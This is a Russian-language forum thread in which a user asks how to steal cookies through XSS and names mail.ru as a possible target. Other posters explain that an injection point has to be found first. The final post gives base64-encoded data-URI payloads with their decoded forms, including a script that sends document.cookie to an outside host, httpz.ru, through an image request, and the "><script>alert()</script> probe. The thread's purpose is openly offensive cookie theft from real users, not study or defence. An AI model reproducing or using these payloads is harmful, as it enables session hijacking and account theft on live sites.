точнее так можно)

Ты видимо не правильный запрос вписал

а как по правильно? открой тайну)

в setcookie данные передаются из формы... имеешь в виду чем длиннее введенные данные в форме тем длиннее куки?)

Неважно с откуда они передаются, я о том это зависит от программиста который сам решает что ему писать в кукисы. Я уж незнаю есть ли там у тебя xss или нет если всеже нет то то заставь вставить твой код в адресную строку при открытой странице.

этот файл нужно не подкинуть, а сделать так, чтоб
код

чудесным образом был внедрён на сайт mail.ru (если тебя mail.ru интересует)

механизм внедрения такого кода называется "XSS"

Вот когда это условие будет выполнено - приступай к следующему этапу

то есть сначало нужно найти xss, а потом отправлять) спс)

и все-таки не догоняю...

вот например такое проходит PHNjcmlwdD4NCmFsZXJ0KFhTUykNCjwvc2NyaXB0Pg== что равно <script>alert(XSS)</script>. а data:text/html;base64,PHNjcmlwdD4NCmltZyA9IG5ldyBJbWFnZSgpOy BpbWcuc3JjID0gImh0dHA6Ly9odHRwei5ydS9u
cGhpcjhseG0xeS5naWY/Iitkb2N1bWVudC5jb29raWU7DQo8L3NjcmlwdD4= что значит <script>
img = new Image(); img.src = "http://httpz.ru/nphir8lxm1y.gif?"+document.cookie;
</script>
не проходит( ведь если проходит "><script>alert()</script> значит уязвимость есть, следовательно и куки должны вороваться